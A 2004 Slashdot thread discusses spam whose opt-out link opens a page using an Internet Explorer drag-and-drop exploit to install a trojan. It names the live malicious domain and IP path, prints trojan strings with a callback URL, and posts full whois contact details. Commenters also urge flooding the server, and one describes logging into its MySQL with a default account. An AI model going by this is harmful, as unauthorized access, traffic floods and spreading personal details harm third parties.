Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site, that when the user scrolls the page, triggers a drag-drop javascript exploit. Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings. As The Reg says "It comes as little surprise that this feature is been taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators." The link in questions points to www. xcelent.biz (As in The Reg story, space intentionally included) so even if you can't block the mail yet it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include "features" such as this in the near future."

devious

[hendridm]

Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running out-dated or low-grade antivirus!

Re:devious

For the lazy, the link in the article didn't work. For the lazy people who don't wan tto type, the link to the cited site is (www.xcelent.biz); but it's recommended you RTFA first to see what's on the site, and choose your browser carefully before clicking. Links like this make goatse look tame.

I dont know about you

[OverlordQ]

but my AntiVirus has detected this exploit for a *long* time.

JS/Exploit-DragDrop.b.gen

Re:I dont know about you

No excuse..

http://www.free-av.com/
http://free.grisoft.com /freeweb.php/doc/2/

Re:I dont know about you

[orangesquid]

A simple string analysis of the trojan reveals some intimidating-looking strings:
GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0 , w32.exe,
Windows Service Application, www.earthlabs.biz,
sockproxy/rec.php.
Software\M icrosoft\Windows\ CurrentVersion\Run
Software\Microsoft\Windows\ CurrentVersion\RunServices
%s?&p=%d&v=%s
VisitWe bPageThread , Socket4RandomThread, Socket4ServerThread
SYSTEM\CurrentControlSet\ Control\SafeBoot\
explorer.exe
Mozilla/4.0 (compatible)
InternetCloseHandle, InternetGetLast ResponseInfoA
InternetReadFile , InternetCrackUrlA
InternetOpenUrlA
InternetOpenA , InternetConnectA
FtpPutFileA, FtpGetFileA
HttpSendRequestA, HttpOpenRequestA
InternetGet ConnectedStateEx, InternetGetConnected State

interesting strings

the executable contains the strings "xProxyBot v 1.0.0" and www.earthlabs.biz/sockproxy/rec.php.

Re:interesting strings

Virus Scan for Linux v4.32.0
Scan engine v4.3.20 for Linux.
Virus data file v4394 created Sep 22 2004

Identified it as:

$ uvscan --secure windows-update32.exe
/home/recall/windows-update3 2.exe
Found the BackDoor-CHP trojan !!!

Re:Microsoft says "No Problem"

Here is the pertinent CERT advisory for this flaw.

The idea is that all the website designer has to do is make an image that LOOKs like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kinds of prompts whatsoever.

Even with SP2 installed.

opt out just confirms ur email address

for all the other lists...

New News?

[Kartik3]

Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

lamer is hosted on hinet.com

[Indy1]

host www.xcelent.biz
www.xcelent.biz has address 61.218.79.53
host 61.218.79.53
53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

and people wonder why i firewall 60/7

MIME Defang

[alatesystems]

This is a good reason to use mime_defang with spamassassin. Either do that or what I do, have it actually attach the message as a .eml file(rfc 822 or whatever) and then you can view it in whatever you want and even reimport it into your mailbox.

I hate spam, but I haven't had a false positive or negative in forever combining the bayes inside spamassassin with the bayes inside thunderbird.

Chris

Re:MIME Defang

[gmuslera]

Or better yet, Anomy Sanitizer. It disables "active" html content (i.e. javascript) attached to mails, can quarantine/rename files by extension, and of course, can call a configurable antivirus to check and take actions.

That is mostly the way i use it, disabling html, checking attached files for virus, and the windows executable extensions that passed the antivirus check gets renamed anyway to make them not executable without strong user action. Attached HTML pages sometimes don't look/work as desired, but I not have to worry about someone receiving this particular piece of spam.

Exploit

[jargoone]

The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

Re:Greeting from Malaysia

[Nos.]

I tried to post the whois for the site as well as the whois for the IP that it's hosted on but gave up when /. said I had too many "junk" characters. Sheesh... here's a quick summary of the IP owner though:

Yu, Shao
4F, No. 7, Aly. 7, Lane 355, Sec. 2, Neihu Rd.
Taipei City
TW
Shao Yu (SY167-TW) hn87788676@hn.hinet.net
+886-9-36-045496

Re:Use your powers for good

[datastalker]

It's a text site... it will take a lot to Slashdot it!

"Scarily"

not a word

Re:Microsoft says "No Problem"

This is my favorite part:

III. Solution

Disable Drag and drop or copy and paste files
Disabling the zone security preference "Drag and drop or copy and paste files" prevents drag and drop operations.

Note: This preference is not honored with Windows XP operating systems.

Oh-well, at least it won't affect my Linux and OS/2 boxes if I turn that off.

The only thing I click on in a Sapm is...

[vasqzr]

The only thing you should be clicking on, in a spam message, is the delete icon/key.

Even better - choose a link with graphics on.

[cliveholloway]

After a little guessing:

a b c d. "d" looks pretty heavy on graphics.

.02

cLive ;-)

Re:Dumb

[Benanov]

That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ Amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

Well I went to look at the virus

[3terrabyte]

I thought it would be neat to see how good their fake-jpeg scrollbar was, so I loaded the page. I had no plans on 'scrolling down'.

Didn't get that far. Just loading the page launched it. Anti-virus kicked in with a warning, home page was attempted to change, and then I got a call from headquarters to follow the delousing drill, since they also get all of our warnings.

Well that was fun. Didn't get to see any scroll bar :(

Windows 2000 - IE 5.50.4807.2300

Re:Well I went to look at the virus

[Naikrovek]

the scrollbar is the real IE scroll bar but there's an invisible image on top of it. When you click and drag you're actually dragging this image onto a small square that follows the mouse cursor - you can't avoid dropping it into that small image.

the js code scrolls the page for you, instead of the actual scroll bar. since you're scrolling the page (via javascript) the real scroll bar reflects the new page position, making you think you actually were dragging the scroll bar.

as you learned, the code doesn't need to be executed to trip the anti-virus. oddly enough my corporate anti-virus didn't catch a thing (it didn't tell me it did anyway), and when i dropped, the empty .exe was installed.

I won't tell you where I work but I will tell you that its a place where you don't want viruses or spyware getting at the very personal data we have on 1:4 of you. You all opted-in for the data collection too. (very large insurance company) I will tell you that we're mandated to use IE and Outlook. Firefox installations will get anyone in this company in deep trouble - thanks SCO, for promoting fear of open source for your own selfish gain!

Win32.Sokeven.D

[davidwr]

39,936 bytes
Added to Computer Associates database 9/21/04

What do other vendors call this?

Best port for a Slashdotting

It is so much better to unsubscribe from this spam using the ssl connection (443). I checked, and it presents the same exploit page as the port 80 page with the benifit (for us) that it requires the extra computational resources of setting up an ssl session. Use the FOX and update often! https://61.218.79.53/o/

Re:interesting ports on the spammer's site

[sfe_software]

3306/tcp open mysql

Interestingly they never disabled the default "test" user for MySQL. Not that much can be done (user "test" has no privileges on any databases) but I was in fact able to log in...

Other sites on same server doing the same thing.

[Chatmag]

There is a slew of sites on that same server according to Webhosting Info that are infected, some with windows-update.exe and others with windows-update32.exe

Hazardous link

[abb3w]

Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\Current Version\Run", "Software\Microsoft\Windows\Current Version\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

I just got exploited

[iMaple]

I decided to try it out on my Windows machine, so opened the link in IE. I had Win XP SP2 and an updated Norton Antivirus and the (new ) Win XP firewall on.
But the exploit worked !! I was expecting to get a pop up from NAV with an exciting alarm sound .
(Un)Fortunately since it worked now I know what it does :
1) Add thw windows-update.exe in the startup folder
2) Add a new file cmd.dat to the startup folder.
Anyway since I had gone so far, I tried running the Windows-udpadte , but that gave me the error that it was not a valid exe file. I ran it in the protected moded (available when u slecet run as.. in Win XP). Then I renamed the dat file to .exe and ran that in the protected mode too. It ran !! It tried to access the internet but I hope the WinXP 2 firewall stoppped it. Anyway got sort of scared since my Win Laptop is not junk and I use it whenever I need a Laptop with standby and Powerpoint. So now I have deleted the files. Cant see any new services in the registry either so hopefully my machine isnt yet a spam mail relay.
BTW if anyone else has tried it out and know about something else that should be done pls let me know. And does anyone have a clue why NAV does not detect this ?? Maybe u need to activate it for IE or make IE the default browser ???

Re:interesting ports on the spammer's site

[5m477m4n]

hmmm, their certificate, issued to SomeOrganization expires on 9/21/2004.

Re:But then again . . .

[mdfst13]

http://www.xcelent.biz/d/ is a link to another page in that domain. Also has more graphics for better slashdotting potential.

P.S. Still be careful. They could always move the pages around.

BWHAHAHAHA!

Honestly, if you "surf" the web these days with:

1) Flash
2) Java
3) Javascript

You are simply asking for an anal reaming. The answer is to use a "secure" browser for common everyday browsing, which will display html and pictures. No cookies, flash, java, or javascript.

And then use a second browser and copy/paste the url when you need more functionality.

Re:More Legislation Needed.

[FuzzyBad-Mofo]

Assent is a perfectly good word, but noone is not.

Your braking my hart, I hate to be a looser grammar nazi, but it's these errors witch need two bee preventated.

Simple really...

[johannesg]

They hired Slashdot to take it down, and we are working on it even as I type this.

Re:Microsoft says "No Problem"

Make sure that you see the link does not have i'm feeling lucky in it, you can copy paste it to notepad if you like to decypher it. Right click, copy link address.

if btnG is in the link (as in btnG=Google+Search) then it's a search, if btnI is, it's I'm feeling lucky, and will take you directly to the url. Same if http:// is in the url, as google believes you meant to go to that address.

DNS trace - Lets give the address' owner a call

[Honest+Man]

Well, we could always call the owner of the site and tell him how much we 'so' appreciate his exploit being used on ppl.

Domain Name: XCELENT.BIZ
Domain ID: D7752456-BIZ
Sponsoring Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Status: clientTransferProhibited
Registrant ID: CNEU-105661
Registrant Name: Anandan Krishan
Registrant Organization: Iscon & Krishan
Registrant Address1: Suite 50-12
Registrant Address2: Jalan Yap Kwan Seng.
Registrant City: Kuala Lumpur
Registrant State/Province: KL
Registrant Postal Code: 50450
Registrant Country: Malaysia
Registrant Country Code: MY
Registrant Phone Number: +603.27756842
Registrant Facsimile Number: +603.27756642
Registrant Email: win2save@yahoo.com
Administrative Contact ID: CNEU-105617
Administrative Contact Name: Anandan Krishan
Administrative Contact Organization: Iscon & Krishan
Administrative Contact Address1: Suite 50-12
Administrative Contact Address2: Jalan Yap Kwan Seng.
Administrative Contact City: Kuala Lumpur
Administrative Contact State/Province: KL
Administrative Contact Postal Code: 50450
Administrative Contact Country: Malaysia
Administrative Contact Country Code: MY
Administrative Contact Phone Number: +603.27756842
Administrative Contact Facsimile Number: +603.27756642
Administrative Contact Email: win2save@yahoo.com
Billing Contact ID: CNEU-105617
Billing Contact Name: Anandan Krishan
Billing Contact Organization: Iscon & Krishan
Billing Contact Address1: Suite 50-12
Billing Contact Address2: Jalan Yap Kwan Seng.
Billing Contact City: Kuala Lumpur
Billing Contact State/Province: KL
Billing Contact Postal Code: 50450
Billing Contact Country: Malaysia
Billing Contact Country Code: MY
Billing Contact Phone Number: +603.27756842
Billing Contact Facsimile Number: +603.27756642
Billing Contact Email: win2save@yahoo.com
Technical Contact ID: CNEU-105617
Technical Contact Name: Anandan Krishan
Technical Contact Organization: Iscon & Krishan
Technical Contact Address1: Suite 50-12
Technical Contact Address2: Jalan Yap Kwan Seng.
Technical Contact City: Kuala Lumpur
Technical Contact State/Province: KL
Technical Contact Postal Code: 50450
Technical Contact Country: Malaysia
Technical Contact Country Code: MY
Technical Contact Phone Number: +603.27756842
Technical Contact Facsimile Number: +603.27756642
Technical Contact Email: win2save@yahoo.com
Name Server: NS1.GRAITHBOADER.BIZ
Name Server: NS2.GRAITHBOADER.BIZ
Name Server: NS2.TIKONDES.BIZ
Created by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Last Updated by Registrar: CSL COMPUTER SERVICE (D.B.A. JOKER.COM)
Domain Registration Date: Wed Sep 15 03:53:27 GMT 2004
Domain Expiration Date: Wed Sep 14 23:59:59 GMT 2005
Domain Last Updated Date: Wed Sep 15 04:03:16 GMT 2004

**

Re:Fill his database

[gad_zuki!]

Because people typing their email addresses into that box means its a "known-good" email address. A list of known-goods beats a list of dead addresses any day of the week.

Re:interesting ports on the spammer's site

[BillX]

mysql> show databases;

(snipped thanks to lameness filter)

4 rows in set (11.56 sec)

mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
...and there it's been sitting for the past half hour or more. I love that 12-seconds just to display the list of DBs. Congratulations Slashdot, you slashdotted the spammer's sql server!